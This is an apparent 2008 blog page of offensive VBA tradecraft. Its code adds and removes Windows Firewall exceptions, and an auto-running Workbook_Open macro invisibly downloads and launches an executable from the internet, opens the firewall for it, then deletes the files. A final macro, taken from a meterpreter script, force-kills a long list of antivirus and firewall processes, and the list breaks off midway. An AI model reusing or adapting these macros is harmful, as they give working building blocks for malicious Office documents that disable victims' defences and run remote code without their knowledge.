Sunday, November 16, 2008

< PRE > tags suck.

Apparently the < PRE > tag kills blogger's ability to do wordwrapping. Awesome. Someone with better blogging skills than I: what's the solution?

Modifying Windows Firewall Rules from VBA

You can also modify the Microsoft Windows firewall from within VBA using the HNetCfg.FwMgr object. Versions of these scripts are available on MSDN.
Function Add_App_To_Firewall(program_name, program_executable, program_scope)

Const NET_FW_PROFILE_DOMAIN = 0
Const NET_FW_PROFILE_STANDARD = 1

Const NET_FW_SCOPE_ALL_NAME = "All subnets"
Const NET_FW_SCOPE_LOCAL_SUBNET_NAME = "Local subnet only"

Const NET_FW_IP_VERSION_ANY = 2

' Create the firewall manager object.
Dim fwMgr
Set fwMgr = CreateObject("HNetCfg.FwMgr")

' Get the current profile for the local firewall policy.
Dim profile
Set profile = fwMgr.LocalPolicy.CurrentProfile

Dim app
Set app = CreateObject("HNetCfg.FwAuthorizedApplication")

app.ProcessImageFileName = program_executable
app.Name = program_name
app.Scope = program_scope

app.IpVersion = NET_FW_IP_VERSION_ANY
app.Enabled = True

On Error Resume Next
profile.AuthorizedApplications.Add app

End Function

Function Remove_App_From_Firewall(program_executable)

On Error Resume Next

' Create the firewall manager object.
Dim fwMgr
Set fwMgr = CreateObject("HNetCfg.FwMgr")

' Get the current profile for the firewall
Dim fwPolicy
Set fwPolicy = fwMgr.LocalPolicy.CurrentProfile

' Get the Auth Applications object so we can modify
Dim colApplications
Set colApplications = fwPolicy.AuthorizedApplications

colApplications.Remove program_executable

End Function

As an example, here's the commands that will download the Tiny Web Server from the internet, unzip it, add it to the allowed exceptions list for the Windows FW, create a quick .html file, start the server, run Internet Explorer pointed to this server, then kill the server, remove the firewall rule, and delete all of the files.

Sub Workbook_Open()
'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip
'Obviously in a real world application you'd want to bring your own unzipper
Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") &amp; "\tinyweb.zip"
Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT

Const NET_FW_SCOPE_ALL = 0, NET_FW_SCOPE_LOCAL_SUBNET = 1, NET_FW_SCOPE_CUSTOM = 2
Add_App_To_Firewall "tiny-local", Environ("TEMP") &amp; "\tiny.exe", NET_FW_SCOPE_LOCAL_SUBNET

Run_Cmd "echo iexplore-pwned > %TEMP%\index.html", INVISIBLE, WAIT

Run_Program "%TEMP%\tiny.exe", "%TEMP% 12345", INVISIBLE, NOWAIT

' "Sleep" for a couple of seconds to allow tiny.exe to load
Run_Cmd "ping -n 2 127.0.0.1", INVISIBLE, WAIT

Run_Program "iexplore", "http://127.0.0.1:12345", VISIBLE, WAIT

Run_Cmd "taskkill /F /IM tiny.exe", INVISIBLE, WAIT

Remove_App_From_Firewall Environ("TEMP") &amp; "\tiny.exe"

On Error Resume Next
Kill Environ("TEMP") &amp; "\tinyweb.zip"
Kill Environ("TEMP") &amp; "\SRC.zip"
Kill Environ("TEMP") &amp; "\LICENSE.txt"
Kill Environ("TEMP") &amp; "\File_id.diz"
Kill Environ("TEMP") &amp; "\Readme.txt"
Kill Environ("TEMP") &amp; "\Cgitest.zip"
Kill Environ("TEMP") &amp; "\index.html"
Kill Environ("TEMP") &amp; "\tiny.exe"

End Sub

How to Kill Antivirus from Word or Excel VBA

Building off of the previous posts and functions, here's how to kill off antivirus from within a VBA Macro in Excel or Word (I stole this list from the meterpreter script):
Function Build_Cmd_List(arrayCmds, command)

If arrayCmds(0) <> "" Then
ReDim Preserve arrayCmds(UBound(arrayCmds) + 1) As String
End If

arrayCmds(UBound(arrayCmds)) = command

End Function

Function Kill_AV()

Dim arrayCmds() As String
ReDim arrayCmds(0) As String
On Error Resume Next

Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ackwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""adaware.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""advxdwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentsvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alertsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alevir.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alogserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""amon9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""anti-trojan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""antivirus.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ants.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""apimonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""aplica32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""apvxdwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""arr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atcon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atro55en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atupdater.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""au.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""aupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""auto-protect.nav80try.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autodown.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autotrace.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autoupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avconsol.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ave32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgcc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-agnt95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icload95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pccwin98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""serv95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv9.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkpop.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkwctl9.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avltmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsynmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwinnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupsrv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitor9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitornt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""backweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bargains.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bd_professional.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""beagle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""belt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidef.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidserver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcpevalsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bisp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blss.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootconf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootwarn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""borg2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bpc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""brasil.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bs120.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bundle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bvt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccevtmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccpxysvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cdp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfgwiz.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""clean.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleanpc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""click.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmesys.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmgrdian.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmon016.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""connectionmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpf9x206.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpfnt206.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwnb181.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwntdwmo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""datemanager.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dcomx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defalert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defscangui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""deputy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""divx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllcache.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllreg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""doors.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpfsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpps2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwatson.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drweb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwebupw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dssagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""efpeadm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""emsw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanhnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanv95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ethereal.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""etrustcipe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""evpn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""exantivirus-cnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""exe.avxw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""expert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""explore.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fameh32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fast.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fch32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fih32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""firewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fnrb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win_trial.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsaa.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530stbyb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530wtbyb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsgk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsm32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsma32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsmb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gator.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbmenu.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbpoll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""generics.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gmt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""guard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""guarddog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hacktracersetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbinst.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbsrv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotactio.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotpatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""htlog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""htpatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hwpe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxdl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxiul.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamstats.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""idle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedriver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iexplorer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ifw2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""inetlnfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""infus.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""infwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""init.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""intdel.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""intren.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""istsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jammer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jdbgmrg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavlite40eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpers40eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kazza.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""keenvalue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-pf-213-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrl-421-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrp-421-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kernel32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""killprocesssetup161.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""launcher.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldnetmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpromenu.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lnetinfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""loader.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""localnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lordpe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luau.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lucomserver.exe"""
